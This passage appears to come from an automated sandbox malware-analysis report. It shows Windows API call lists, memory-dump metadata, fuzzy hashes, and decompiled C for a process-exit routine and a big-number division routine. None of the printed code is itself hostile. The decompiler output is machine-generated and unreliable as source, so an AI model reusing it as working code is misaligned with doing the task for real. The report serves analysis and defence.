                                                                                                • LockResource.KERNEL32(00000000,?,00000000,00FB59B0,000000FF,?,00F7401D,00F736B8,?,00000000,00000000,?,?,?,?,00F736B8), ref: 00F74A66
                                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,00000000,00FB59B0,000000FF,?,00F7401D,00F736B8,?,00000000,00000000,?,?,?), ref: 00F74A74
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Resource$LoadLockSizeof
                                                                                                • String ID:
                                                                                                • API String ID: 2853612939-0
                                                                                                • Opcode ID: 0e68aa4e8c943625f2836717e0dd8d69d821d9bc23f1bb1f1c1964f97d6686b2
                                                                                                • Instruction ID: fafbeada937d5f91440ab5b13c0afd9e5aba9e06b46f80582e9bde3fdbf0177a
                                                                                                • Opcode Fuzzy Hash: 0e68aa4e8c943625f2836717e0dd8d69d821d9bc23f1bb1f1c1964f97d6686b2
                                                                                                • Instruction Fuzzy Hash: 13112332E406189BDB318F19DC44A66F7ECE784B60F01862BEC19C3640EB39AC00DA95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00FA255E(int _a4) {
                                                                                                				void* _t14;
                                                                                                
                                                                                                				if(E00FA90B9(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                                                                                					TerminateProcess(GetCurrentProcess(), _a4);
                                                                                                				}
                                                                                                				E00FA25A0(_t14, _a4);
                                                                                                				ExitProcess(_a4);
                                                                                                			}




                                                                                                0x00fa256b
                                                                                                0x00fa2587
                                                                                                0x00fa2587
                                                                                                0x00fa2590
                                                                                                0x00fa2599

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00F79528,?,00FA255D,?,?,00F79528,?,00F79528,00000000), ref: 00FA2580
                                                                                                • TerminateProcess.KERNEL32(00000000,?,00FA255D,?,?,00F79528,?,00F79528,00000000), ref: 00FA2587
                                                                                                • ExitProcess.KERNEL32 ref: 00FA2599
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 1703294689-0
                                                                                                • Opcode ID: 0d5fc277564df9bbe41a59bb1d895d2c37ebf550659d6a8ca5f82c8be9d4a0b4
                                                                                                • Instruction ID: 0c3fe2a92691c78d1ccbace12ace6b8c06f86e7e62f703404022d242c25370f7
                                                                                                • Opcode Fuzzy Hash: 0d5fc277564df9bbe41a59bb1d895d2c37ebf550659d6a8ca5f82c8be9d4a0b4
                                                                                                • Instruction Fuzzy Hash: 61E0B671911608AFCF516F68DC59A583BADFB813D1B484618F80586131CB7AED83FE90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 94%
                                                                                                			E00F9FBF0(signed int* _a4, intOrPtr* _a8) {
                                                                                                				signed int _v8;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _v20;
                                                                                                				signed int _v24;
                                                                                                				signed int _v28;
                                                                                                				signed int _v32;
                                                                                                				signed int _v36;
                                                                                                				signed int _v40;
                                                                                                				signed int _v48;
                                                                                                				signed int _v52;
                                                                                                				signed int _v56;
                                                                                                				signed int _v60;
                                                                                                				intOrPtr* _v64;
                                                                                                				signed int _v68;
                                                                                                				signed int _v72;
                                                                                                				signed int _v76;
                                                                                                				signed int* _v80;
                                                                                                				char _v540;
                                                                                                				signed int _v544;
                                                                                                				signed int _t190;
                                                                                                				signed int _t191;
                                                                                                				intOrPtr _t192;
                                                                                                				signed int _t195;
                                                                                                				signed int _t197;
                                                                                                				signed int _t199;
                                                                                                				signed int _t200;
                                                                                                				signed int _t204;
                                                                                                				signed int _t210;
                                                                                                				intOrPtr _t216;
                                                                                                				void* _t219;
                                                                                                				signed int _t221;
                                                                                                				signed int _t232;
                                                                                                				void* _t236;
                                                                                                				signed int _t239;
                                                                                                				signed int* _t244;
                                                                                                				signed int _t245;
                                                                                                				signed int* _t246;
                                                                                                				signed int* _t247;
                                                                                                				signed int _t249;
                                                                                                				signed int _t250;
                                                                                                				void* _t251;
                                                                                                				intOrPtr* _t252;
                                                                                                				signed int _t254;
                                                                                                				unsigned int _t255;
                                                                                                				signed int _t257;
                                                                                                				signed int* _t261;
                                                                                                				signed int _t262;
                                                                                                				signed int _t263;
                                                                                                				intOrPtr _t265;
                                                                                                				void* _t269;
                                                                                                				signed char _t275;
                                                                                                				signed int* _t278;
                                                                                                				signed int _t282;
                                                                                                				signed int* _t283;
                                                                                                				intOrPtr* _t290;
                                                                                                				signed int _t292;
                                                                                                				signed int _t293;
                                                                                                				signed int* _t296;
                                                                                                				signed int _t297;
                                                                                                				signed int _t299;
                                                                                                				intOrPtr* _t300;
                                                                                                				signed int _t304;
                                                                                                				signed int _t305;
                                                                                                				signed int _t310;
                                                                                                				signed int _t313;
                                                                                                				signed int _t314;
                                                                                                				signed int _t315;
                                                                                                				void* _t316;
                                                                                                				signed int _t317;
                                                                                                				signed int _t320;
                                                                                                				signed int _t324;
                                                                                                				signed int* _t325;
                                                                                                				signed int _t326;
                                                                                                				signed int _t327;
                                                                                                				signed int _t328;
                                                                                                				signed int _t329;
                                                                                                				void* _t330;
                                                                                                				signed int _t335;
                                                                                                				signed int _t342;
                                                                                                				signed int* _t343;
                                                                                                
                                                                                                				_t244 = _a4;
                                                                                                				_t326 =  *_t244;
                                                                                                				if(_t326 == 0) {
                                                                                                					L75:
                                                                                                					__eflags = 0;
                                                                                                					return 0;
                                                                                                				} else {
                                                                                                					_t290 = _a8;
                                                                                                					_t190 =  *_t290;
                                                                                                					_v56 = _t190;
                                                                                                					if(_t190 == 0) {
                                                                                                						goto L75;
                                                                                                					} else {
                                                                                                						_t313 = _t190 - 1;
                                                                                                						_t254 = _t326 - 1;
                                                                                                						_v12 = _t254;
                                                                                                						if(_t313 != 0) {
                                                                                                							__eflags = _t313 - _t254;
                                                                                                							if(_t313 > _t254) {
                                                                                                								goto L75;
                                                                                                							} else {
                                                                                                								_t191 = _t254;
                                                                                                								_t292 = _t254 - _t313;
                                                                                                								__eflags = _t254 - _t292;
                                                                                                								if(_t254 < _t292) {
                                                                                                									L19:
                                                                                                									_t292 = _t292 + 1;
                                                                                                									__eflags = _t292;
                                                                                                								} else {
                                                                                                									_t278 =  &(_t244[_t254 + 1]);
                                                                                                									_t342 = _a8 + _t313 * 4 + 4;
                                                                                                									__eflags = _t342;
                                                                                                									while(1) {
                                                                                                										__eflags =  *_t342 -  *_t278;
                                                                                                										if(__eflags != 0) {
                                                                                                											break;
                                                                                                										}
                                                                                                										_t191 = _t191 - 1;
                                                                                                										_t342 = _t342 - 4;
                                                                                                										_t278 = _t278 - 4;
                                                                                                										__eflags = _t191 - _t292;
                                                                                                										if(_t191 >= _t292) {
                                                                                                											continue;
                                                                                                										} else {
                                                                                                											goto L19;
                                                                                                										}
                                                                                                										goto L20;
                                                                                                									}
                                                                                                									if(__eflags < 0) {
                                                                                                										goto L19;
                                                                                                									}
                                                                                                								}
                                                                                                								L20:
                                                                                                								__eflags = _t292;
                                                                                                								if(__eflags == 0) {
                                                                                                									goto L75;
                                                                                                								} else {
                                                                                                									_t192 = _a8;
                                                                                                									_t245 = _v56;
                                                                                                									_t327 =  *(_t192 + _t245 * 4);
                                                                                                									_t55 = _t245 * 4; // 0xfffef7d7
                                                                                                									_t255 =  *(_t192 + _t55 - 4);
                                                                                                									asm("bsr eax, esi");
                                                                                                									_v52 = _t327;
                                                                                                									_v36 = _t255;
                                                                                                									if(__eflags == 0) {
                                                                                                										_t314 = 0x20;
                                                                                                									} else {
                                                                                                										_t314 = 0x1f - _t192;
                                                                                                									}
                                                                                                									_v16 = _t314;
                                                                                                									_v48 = 0x20 - _t314;
                                                                                                									__eflags = _t314;
                                                                                                									if(_t314 != 0) {
                                                                                                										_t275 = _t314;
                                                                                                										_v36 = _v36 << _t275;
                                                                                                										_v52 = _t327 << _t275 | _t255 >> _v48;
                                                                                                										__eflags = _t245 - 2;
                                                                                                										if(_t245 > 2) {
                                                                                                											_t68 = _t245 * 4; // 0xe850ffff
                                                                                                											_t70 =  &_v36;
                                                                                                											 *_t70 = _v36 |  *(_a8 + _t68 - 8) >> _v48;
                                                                                                											__eflags =  *_t70;
                                                                                                										}
                                                                                                									}
                                                                                                									_t328 = 0;
                                                                                                									_v32 = 0;
                                                                                                									_t293 = _t292 + 0xffffffff;
                                                                                                									__eflags = _t293;
                                                                                                									_v28 = _t293;
                                                                                                									if(_t293 >= 0) {
                                                                                                										_t197 = _t293 + _t245;
                                                                                                										_t247 = _a4;
                                                                                                										_v60 = _t197;
                                                                                                										_v64 = _t247 + 4 + _t293 * 4;
                                                                                                										_t261 = _t247 - 4 + _t197 * 4;
                                                                                                										_v80 = _t261;
                                                                                                										do {
                                                                                                											__eflags = _t197 - _v12;
                                                                                                											if(_t197 > _v12) {
                                                                                                												_t198 = 0;
                                                                                                												__eflags = 0;
                                                                                                											} else {
                                                                                                												_t198 = _t261[2];
                                                                                                											}
                                                                                                											_t297 = _t261[1];
                                                                                                											_t262 =  *_t261;
                                                                                                											_v76 = _t198;
                                                                                                											_v40 = 0;
                                                                                                											_v8 = _t198;
                                                                                                											_v24 = _t262;
                                                                                                											__eflags = _t314;
                                                                                                											if(_t314 != 0) {
                                                                                                												_t304 = _v8;
                                                                                                												_t320 = _t262 >> _v48;
                                                                                                												_t221 = E00FB3C00(_t297, _v16, _t304);
                                                                                                												_t262 = _v16;
                                                                                                												_t198 = _t304;
                                                                                                												_t297 = _t320 | _t221;
                                                                                                												_t328 = _v24 << _t262;
                                                                                                												__eflags = _v60 - 3;
                                                                                                												_v8 = _t304;
                                                                                                												_v24 = _t328;
                                                                                                												if(_v60 >= 3) {
                                                                                                													_t262 = _v48;
                                                                                                													_t328 = _t328 |  *(_t247 + (_v56 + _v28) * 4 - 8) >> _t262;
                                                                                                													__eflags = _t328;
                                                                                                													_t198 = _v8;
                                                                                                													_v24 = _t328;
                                                                                                												}
                                                                                                											}
                                                                                                											_push(_t247);
                                                                                                											_t199 = E00FB3B60(_t297, _t198, _v52, 0);
                                                                                                											_v40 = _t247;
                                                                                                											_t249 = _t199;
                                                                                                											_t329 = _t328 ^ _t328;
                                                                                                											_t200 = _t297;
                                                                                                											_v8 = _t249;
                                                                                                											_v20 = _t200;
                                                                                                											_t315 = _t262;
                                                                                                											_v72 = _t249;
                                                                                                											_v68 = _t200;
                                                                                                											_v40 = _t329;
                                                                                                											__eflags = _t200;
                                                                                                											if(_t200 != 0) {
                                                                                                												L37:
                                                                                                												_t250 = _t249 + 1;
                                                                                                												asm("adc eax, 0xffffffff");
                                                                                                												_t315 = _t315 + E00FB3960(_t250, _t200, _v52, 0);
                                                                                                												asm("adc esi, edx");
                                                                                                												_t249 = _t250 | 0xffffffff;
                                                                                                												_t200 = 0;
                                                                                                												__eflags = 0;
                                                                                                												_v40 = _t329;
                                                                                                												_v8 = _t249;
                                                                                                												_v72 = _t249;
                                                                                                												_v20 = 0;
                                                                                                												_v68 = 0;
                                                                                                											} else {
                                                                                                												__eflags = _t249 - 0xffffffff;
                                                                                                												if(_t249 > 0xffffffff) {
                                                                                                													goto L37;
                                                                                                												}
                                                                                                											}
                                                                                                											__eflags = _t329;
                                                                                                											if(__eflags <= 0) {
                                                                                                												if(__eflags < 0) {
                                                                                                													goto L42;
                                                                                                												} else {
                                                                                                													__eflags = _t315 - 0xffffffff;
                                                                                                													if(_t315 <= 0xffffffff) {
                                                                                                														while(1) {
                                                                                                															L42:
                                                                                                															_v8 = _v24;
                                                                                                															_t219 = E00FB3960(_v36, 0, _t249, _t200);
                                                                                                															__eflags = _t297 - _t315;
                                                                                                															if(__eflags < 0) {
                                                                                                																break;
                                                                                                															}
                                                                                                															if(__eflags > 0) {
                                                                                                																L45:
                                                                                                																_t200 = _v20;
                                                                                                																_t249 = _t249 + 0xffffffff;
                                                                                                																_v72 = _t249;
                                                                                                																asm("adc eax, 0xffffffff");
                                                                                                																_t315 = _t315 + _v52;
                                                                                                																__eflags = _t315;
                                                                                                																_v20 = _t200;
                                                                                                																asm("adc dword [ebp-0x24], 0x0");
                                                                                                																_v68 = _t200;
                                                                                                																if(_t315 == 0) {
                                                                                                																	__eflags = _t315 - 0xffffffff;
                                                                                                																	if(_t315 <= 0xffffffff) {
                                                                                                																		continue;
                                                                                                																	} else {
                                                                                                																	}
                                                                                                																}
                                                                                                															} else {
                                                                                                																__eflags = _t219 - _v8;
                                                                                                																if(_t219 <= _v8) {
                                                                                                																	break;
                                                                                                																} else {
                                                                                                																	goto L45;
                                                                                                																}
                                                                                                															}
                                                                                                															L49:
                                                                                                															_v8 = _t249;
                                                                                                															goto L50;
                                                                                                														}
                                                                                                														_t200 = _v20;
                                                                                                														goto L49;
                                                                                                													}
                                                                                                												}
                                                                                                											}
                                                                                                											L50:
                                                                                                											__eflags = _t200;
                                                                                                											if(_t200 != 0) {
                                                                                                												L52:
                                                                                                												_t263 = _v56;
                                                                                                												_t316 = 0;
                                                                                                												_t330 = 0;
                                                                                                												__eflags = _t263;
                                                                                                												if(_t263 != 0) {
                                                                                                													_t252 = _v64;
                                                                                                													_t210 = _a8 + 4;
                                                                                                													__eflags = _t210;
                                                                                                													_v40 = _t210;
                                                                                                													_v24 = _t263;
                                                                                                													do {
                                                                                                														_v12 =  *_t210;
                                                                                                														_t216 =  *_t252;
                                                                                                														_t269 = _t316 + _v72 * _v12;
                                                                                                														asm("adc esi, edx");
                                                                                                														_t316 = _t330;
                                                                                                														_t330 = 0;
                                                                                                														__eflags = _t216 - _t269;
                                                                                                														if(_t216 < _t269) {
                                                                                                															_t316 = _t316 + 1;
                                                                                                															asm("adc esi, esi");
                                                                                                														}
                                                                                                														 *_t252 = _t216 - _t269;
                                                                                                														_t252 = _t252 + 4;
                                                                                                														_t210 = _v40 + 4;
                                                                                                														_t153 =  &_v24;
                                                                                                														 *_t153 = _v24 - 1;
                                                                                                														__eflags =  *_t153;
                                                                                                														_v40 = _t210;
                                                                                                													} while ( *_t153 != 0);
                                                                                                													_t249 = _v8;
                                                                                                													_t263 = _v56;
                                                                                                												}
                                                                                                												__eflags = 0 - _t330;
                                                                                                												if(__eflags <= 0) {
                                                                                                													if(__eflags < 0) {
                                                                                                														L61:
                                                                                                														__eflags = _t263;
                                                                                                														if(_t263 != 0) {
                                                                                                															_t251 = 0;
                                                                                                															_t300 = _v64;
                                                                                                															_t335 = _a8 + 4;
                                                                                                															__eflags = _t335;
                                                                                                															_t317 = _t263;
                                                                                                															do {
                                                                                                																_t265 =  *_t300;
                                                                                                																_t161 = _t335 + 4; // 0xf8835959
                                                                                                																_t335 = _t161;
                                                                                                																_t300 = _t300 + 4;
                                                                                                																asm("adc eax, eax");
                                                                                                																 *((intOrPtr*)(_t300 - 4)) = _t265 +  *((intOrPtr*)(_t335 - 4)) + _t251;
                                                                                                																asm("adc eax, 0x0");
                                                                                                																_t251 = 0;
                                                                                                																_t317 = _t317 - 1;
                                                                                                																__eflags = _t317;
                                                                                                															} while (_t317 != 0);
                                                                                                															_t249 = _v8;
                                                                                                														}
                                                                                                														_t249 = _t249 + 0xffffffff;
                                                                                                														asm("adc dword [ebp-0x10], 0xffffffff");
                                                                                                													} else {
                                                                                                														__eflags = _v76 - _t316;
                                                                                                														if(_v76 < _t316) {
                                                                                                															goto L61;
                                                                                                														}
                                                                                                													}
                                                                                                												}
                                                                                                												_t204 = _v60 - 1;
                                                                                                												__eflags = _t204;
                                                                                                												_v12 = _t204;
                                                                                                											} else {
                                                                                                												__eflags = _t249;
                                                                                                												if(_t249 != 0) {
                                                                                                													goto L52;
                                                                                                												}
                                                                                                											}
                                                                                                											_t328 = _v32;
                                                                                                											_t247 = _a4;
                                                                                                											asm("adc esi, 0x0");
                                                                                                											_v64 = _v64 - 4;
                                                                                                											_t299 = _v28 - 1;
                                                                                                											_t314 = _v16;
                                                                                                											_t261 = _v80 - 4;
                                                                                                											_v32 = 0 + _t249;
                                                                                                											_t197 = _v60 - 1;
                                                                                                											_v28 = _t299;
                                                                                                											_v60 = _t197;
                                                                                                											_v80 = _t261;
                                                                                                											__eflags = _t299;
                                                                                                										} while (_t299 >= 0);
                                                                                                									}
                                                                                                									_t246 = _a4;
                                                                                                									_t257 = _v12 + 1;
                                                                                                									_t195 = _t257;
                                                                                                									__eflags = _t195 -  *_t246;
                                                                                                									if(_t195 <  *_t246) {
                                                                                                										_t296 =  &(( &(_t246[1]))[_t195]);
                                                                                                										do {
                                                                                                											 *_t296 = 0;
                                                                                                											_t296 =  &(_t296[1]);
                                                                                                											_t195 = _t195 + 1;
                                                                                                											__eflags = _t195 -  *_t246;
                                                                                                										} while (_t195 <  *_t246);
                                                                                                									}
                                                                                                									 *_t246 = _t257;
                                                                                                									__eflags = _t257;
                                                                                                									if(_t257 != 0) {
                                                                                                										while(1) {
                                                                                                											__eflags = _t246[_t257];
                                                                                                											if(_t246[_t257] != 0) {
                                                                                                												goto L74;
                                                                                                											}
                                                                                                											_t257 = _t257 + 0xffffffff;
                                                                                                											__eflags = _t257;
                                                                                                											 *_t246 = _t257;
                                                                                                											if(_t257 != 0) {
                                                                                                												continue;
                                                                                                											}
                                                                                                											goto L74;
                                                                                                										}
                                                                                                									}
                                                                                                									L74:
                                                                                                									return _v32;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t7 = _t290 + 4; // 0x96850f0a
                                                                                                							_t305 =  *_t7;
                                                                                                							_v12 = _t305;
                                                                                                							if(_t305 != 1) {
                                                                                                								__eflags = _t254;
                                                                                                								if(_t254 != 0) {
                                                                                                									_t324 = 0;
                                                                                                									_v16 = 0;
                                                                                                									_v40 = 0;
                                                                                                									_v28 = 0;
                                                                                                									__eflags = _t254 - 0xffffffff;
                                                                                                									if(_t254 != 0xffffffff) {
                                                                                                										_t282 = _t254 + 1;
                                                                                                										__eflags = _t282;
                                                                                                										_t283 =  &(_t244[_t282]);
                                                                                                										_v32 = _t283;
                                                                                                										do {
                                                                                                											_t236 = E00FB3B60( *_t283, _t324, _t305, 0);
                                                                                                											_v28 = _t244;
                                                                                                											_t244 = _t244;
                                                                                                											_v68 = _t305;
                                                                                                											_t324 = _t283;
                                                                                                											_v16 = 0 + _t236;
                                                                                                											_t305 = _v12;
                                                                                                											asm("adc ecx, 0x0");
                                                                                                											_v40 = _v16;
                                                                                                											_t283 = _v32 - 4;
                                                                                                											_v32 = _t283;
                                                                                                											_t326 = _t326 - 1;
                                                                                                											__eflags = _t326;
                                                                                                										} while (_t326 != 0);
                                                                                                										_t244 = _a4;
                                                                                                									}
                                                                                                									_v544 = 0;
                                                                                                									_t343 =  &(_t244[1]);
                                                                                                									 *_t244 = 0;
                                                                                                									E00FA009F(_t343, 0x1cc,  &_v540, 0);
                                                                                                									_t232 = _v28;
                                                                                                									__eflags = 0 - _t232;
                                                                                                									 *_t343 = _t324;
                                                                                                									_t244[2] = _t232;
                                                                                                									asm("sbb ecx, ecx");
                                                                                                									__eflags =  ~0x00000000;
                                                                                                									 *_t244 = 0xbadbae;
                                                                                                									return _v16;
                                                                                                								} else {
                                                                                                									_t325 =  &(_t244[1]);
                                                                                                									_v544 = _t254;
                                                                                                									 *_t244 = _t254;
                                                                                                									E00FA009F(_t325, 0x1cc,  &_v540, _t254);
                                                                                                									_t239 = _t244[1];
                                                                                                									_t310 = _t239 % _v12;
                                                                                                									__eflags = 0 - _t310;
                                                                                                									 *_t325 = _t310;
                                                                                                									asm("sbb ecx, ecx");
                                                                                                									__eflags = 0;
                                                                                                									 *_t244 =  ~0x00000000;
                                                                                                									return _t239 / _v12;
                                                                                                								}
                                                                                                							} else {
                                                                                                								_v544 = _t313;
                                                                                                								 *_t244 = _t313;
                                                                                                								E00FA009F( &(_t244[1]), 0x1cc,  &_v540, _t313);
                                                                                                								return _t244[1];
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                			}




















































































                                                                                                0x00f9fbfc
                                                                                                0x00f9fc01
                                                                                                0x00f9fc05
                                                                                                0x00fa007f
                                                                                                0x00fa0081
                                                                                                0x00fa0087
                                                                                                0x00f9fc0b
                                                                                                0x00f9fc0b
                                                                                                0x00f9fc0e
                                                                                                0x00f9fc10
                                                                                                0x00f9fc15
                                                                                                0x00000000
                                                                                                0x00f9fc1b
                                                                                                0x00f9fc1b
                                                                                                0x00f9fc1e
                                                                                                0x00f9fc21
                                                                                                0x00f9fc26
                                                                                                0x00f9fd57
                                                                                                0x00f9fd59
                                                                                                0x00000000
                                                                                                0x00f9fd5f
                                                                                                0x00f9fd61
                                                                                                0x00f9fd63
                                                                                                0x00f9fd65
                                                                                                0x00f9fd67
                                                                                                0x00f9fd8d
                                                                                                0x00f9fd8d
                                                                                                0x00f9fd8d
                                                                                                0x00f9fd69
                                                                                                0x00f9fd70
                                                                                                0x00f9fd73
                                                                                                0x00f9fd73
                                                                                                0x00f9fd76
                                                                                                0x00f9fd7a
                                                                                                0x00f9fd7c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f9fd7e
                                                                                                0x00f9fd7f
                                                                                                0x00f9fd82
                                                                                                0x00f9fd85
                                                                                                0x00f9fd87
                                                                                                0x00000000
                                                                                                0x00f9fd89
                                                                                                0x00000000
                                                                                                0x00f9fd89
                                                                                                0x00000000
                                                                                                0x00f9fd87
                                                                                                0x00f9fd8b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f9fd8b
                                                                                                0x00f9fd8e
                                                                                                0x00f9fd8e
                                                                                                0x00f9fd90
                                                                                                0x00000000
                                                                                                0x00f9fd96
                                                                                                0x00f9fd96
                                                                                                0x00f9fd99
                                                                                                0x00f9fd9c
                                                                                                0x00f9fd9f
                                                                                                0x00f9fd9f
                                                                                                0x00f9fda3
                                                                                                0x00f9fda6
                                                                                                0x00f9fda9
                                                                                                0x00f9fdac
                                                                                                0x00f9fdb7
                                                                                                0x00f9fdae
                                                                                                0x00f9fdb3
                                                                                                0x00f9fdb3
                                                                                                0x00f9fdc1
                                                                                                0x00f9fdc6
                                                                                                0x00f9fdc9
                                                                                                0x00f9fdcb
                                                                                                0x00f9fdd4
                                                                                                0x00f9fdd6
                                                                                                0x00f9fddd
                                                                                                0x00f9fde0
                                                                                                0x00f9fde3
                                                                                                0x00f9fdeb
                                                                                                0x00f9fdf1
                                                                                                0x00f9fdf1
                                                                                                0x00f9fdf1
                                                                                                0x00f9fdf1
                                                                                                0x00f9fde3
                                                                                                0x00f9fdf4
                                                                                                0x00f9fdf6
                                                                                                0x00f9fdfd
                                                                                                0x00f9fdfd
                                                                                                0x00f9fe00
                                                                                                0x00f9fe03
                                                                                                0x00f9fe09
                                                                                                0x00f9fe0c
                                                                                                0x00f9fe0f
                                                                                                0x00f9fe18
                                                                                                0x00f9fe1e
                                                                                                0x00f9fe21
                                                                                                0x00f9fe24
                                                                                                0x00f9fe24
                                                                                                0x00f9fe27
                                                                                                0x00f9fe2e
                                                                                                0x00f9fe2e
                                                                                                0x00f9fe29
                                                                                                0x00f9fe29
                                                                                                0x00f9fe29
                                                                                                0x00f9fe30
                                                                                                0x00f9fe33
                                                                                                0x00f9fe35
                                                                                                0x00f9fe38
                                                                                                0x00f9fe3f
                                                                                                0x00f9fe42
                                                                                                0x00f9fe45
                                                                                                0x00f9fe47
                                                                                                0x00f9fe52
                                                                                                0x00f9fe55
                                                                                                0x00f9fe5a
                                                                                                0x00f9fe5f
                                                                                                0x00f9fe66
                                                                                                0x00f9fe6b
                                                                                                0x00f9fe6d
                                                                                                0x00f9fe6f
                                                                                                0x00f9fe73
                                                                                                0x00f9fe76
                                                                                                0x00f9fe79
                                                                                                0x00f9fe81
                                                                                                0x00f9fe8a
                                                                                                0x00f9fe8a
                                                                                                0x00f9fe8c
                                                                                                0x00f9fe8f
                                                                                                0x00f9fe8f
                                                                                                0x00f9fe79
                                                                                                0x00f9fe92
                                                                                                0x00f9fe9a
                                                                                                0x00f9fe9f
                                                                                                0x00f9fea4
                                                                                                0x00f9fea6
                                                                                                0x00f9fea8
                                                                                                0x00f9feaa
                                                                                                0x00f9fead
                                                                                                0x00f9feb0
                                                                                                0x00f9feb2
                                                                                                0x00f9feb5
                                                                                                0x00f9feb8
                                                                                                0x00f9febb
                                                                                                0x00f9febd
                                                                                                0x00f9fec4
                                                                                                0x00f9fec9
                                                                                                0x00f9fecc
                                                                                                0x00f9fed6
                                                                                                0x00f9fed8
                                                                                                0x00f9feda
                                                                                                0x00f9fedd
                                                                                                0x00f9fedd
                                                                                                0x00f9fedf
                                                                                                0x00f9fee2
                                                                                                0x00f9fee5
                                                                                                0x00f9fee8
                                                                                                0x00f9feeb
                                                                                                0x00f9febf
                                                                                                0x00f9febf
                                                                                                0x00f9fec2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f9fec2
                                                                                                0x00f9feee
                                                                                                0x00f9fef0
                                                                                                0x00f9fef2
                                                                                                0x00000000
                                                                                                0x00f9fef4
                                                                                                0x00f9fef4
                                                                                                0x00f9fef7
                                                                                                0x00f9ff00
                                                                                                0x00f9ff00
                                                                                                0x00f9ff0e
                                                                                                0x00f9ff11
                                                                                                0x00f9ff16
                                                                                                0x00f9ff18
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f9ff1a
                                                                                                0x00f9ff21
                                                                                                0x00f9ff21
                                                                                                0x00f9ff24
                                                                                                0x00f9ff27
                                                                                                0x00f9ff2a
                                                                                                0x00f9ff2d
                                                                                                0x00f9ff2d
                                                                                                0x00f9ff30
                                                                                                0x00f9ff33
                                                                                                0x00f9ff37
                                                                                                0x00f9ff3a
                                                                                                0x00f9ff3c
                                                                                                0x00f9ff3f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f9ff41
                                                                                                0x00f9ff3f
                                                                                                0x00f9ff1c
                                                                                                0x00f9ff1c
                                                                                                0x00f9ff1f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f9ff1f
                                                                                                0x00f9ff46
                                                                                                0x00f9ff46
                                                                                                0x00000000
                                                                                                0x00f9ff46
                                                                                                0x00f9ff43
                                                                                                0x00000000
                                                                                                0x00f9ff43
                                                                                                0x00f9fef7
                                                                                                0x00f9fef2
                                                                                                0x00f9ff49
                                                                                                0x00f9ff49
                                                                                                0x00f9ff4b
                                                                                                0x00f9ff55
                                                                                                0x00f9ff55
                                                                                                0x00f9ff58
                                                                                                0x00f9ff5a
                                                                                                0x00f9ff5c
                                                                                                0x00f9ff5e
                                                                                                0x00f9ff63
                                                                                                0x00f9ff66
                                                                                                0x00f9ff66
                                                                                                0x00f9ff69
                                                                                                0x00f9ff6c
                                                                                                0x00f9ff70
                                                                                                0x00f9ff72
                                                                                                0x00f9ff87
                                                                                                0x00f9ff89
                                                                                                0x00f9ff8b
                                                                                                0x00f9ff8d
                                                                                                0x00f9ff8f
                                                                                                0x00f9ff91
                                                                                                0x00f9ff93
                                                                                                0x00f9ff95
                                                                                                0x00f9ff98
                                                                                                0x00f9ff98
                                                                                                0x00f9ff9c
                                                                                                0x00f9ff9e
                                                                                                0x00f9ffa4
                                                                                                0x00f9ffa7
                                                                                                0x00f9ffa7
                                                                                                0x00f9ffa7
                                                                                                0x00f9ffab
                                                                                                0x00f9ffab
                                                                                                0x00f9ffb0
                                                                                                0x00f9ffb3
                                                                                                0x00f9ffb3
                                                                                                0x00f9ffb8
                                                                                                0x00f9ffba
                                                                                                0x00f9ffbc
                                                                                                0x00f9ffc3
                                                                                                0x00f9ffc3
                                                                                                0x00f9ffc5
                                                                                                0x00f9ffca
                                                                                                0x00f9ffcc
                                                                                                0x00f9ffcf
                                                                                                0x00f9ffcf
                                                                                                0x00f9ffd2
                                                                                                0x00f9ffd4
                                                                                                0x00f9ffd4
                                                                                                0x00f9ffd6
                                                                                                0x00f9ffd6
                                                                                                0x00f9ffdb
                                                                                                0x00f9ffe1
                                                                                                0x00f9ffe5
                                                                                                0x00f9ffe8
                                                                                                0x00f9ffeb
                                                                                                0x00f9ffed
                                                                                                0x00f9ffed
                                                                                                0x00f9ffed
                                                                                                0x00f9fff2
                                                                                                0x00f9fff2
                                                                                                0x00f9fff5
                                                                                                0x00f9fff8
                                                                                                0x00f9ffbe
                                                                                                0x00f9ffbe
                                                                                                0x00f9ffc1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f9ffc1
                                                                                                0x00f9ffbc
                                                                                                0x00f9ffff
                                                                                                0x00f9ffff
                                                                                                0x00fa0000
                                                                                                0x00f9ff4d
                                                                                                0x00f9ff4d
